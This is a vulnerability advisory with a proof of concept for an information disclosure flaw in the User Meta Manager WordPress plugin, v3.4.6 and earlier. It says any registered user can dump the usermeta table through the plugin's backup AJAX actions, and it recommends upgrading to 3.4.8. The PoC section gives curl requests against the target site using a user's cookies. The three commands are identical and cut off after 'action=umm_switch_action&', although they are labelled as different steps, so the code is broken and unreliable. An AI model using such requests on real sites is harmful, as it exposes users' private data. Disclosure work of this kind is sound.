* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps
## Description
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a
information disclosure vulnerability. Any registered user can perform an
a series of AJAX requests, in order to get all contents of `usermeta` DB
table.
`usermeta` table holds additional information for all registered users.
User Meta Manager plugin offers a `usermeta` table backup functionality.
During the backup process the plugin takes no action in protecting the
leakage of the table contents to unauthorized (non-admin) users.
## PoC
### Get as MySQL query
First a backup table must be created
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/
?action=umm_switch_action&
```
Then we get the table with another request
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/
?action=umm_switch_action&
```
### Get as CSV file
```sh
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/
?action=umm_switch_action&
```
## Solution
Upgrade to version 3.4.8
Komentarų nėra:
Rašyti komentarą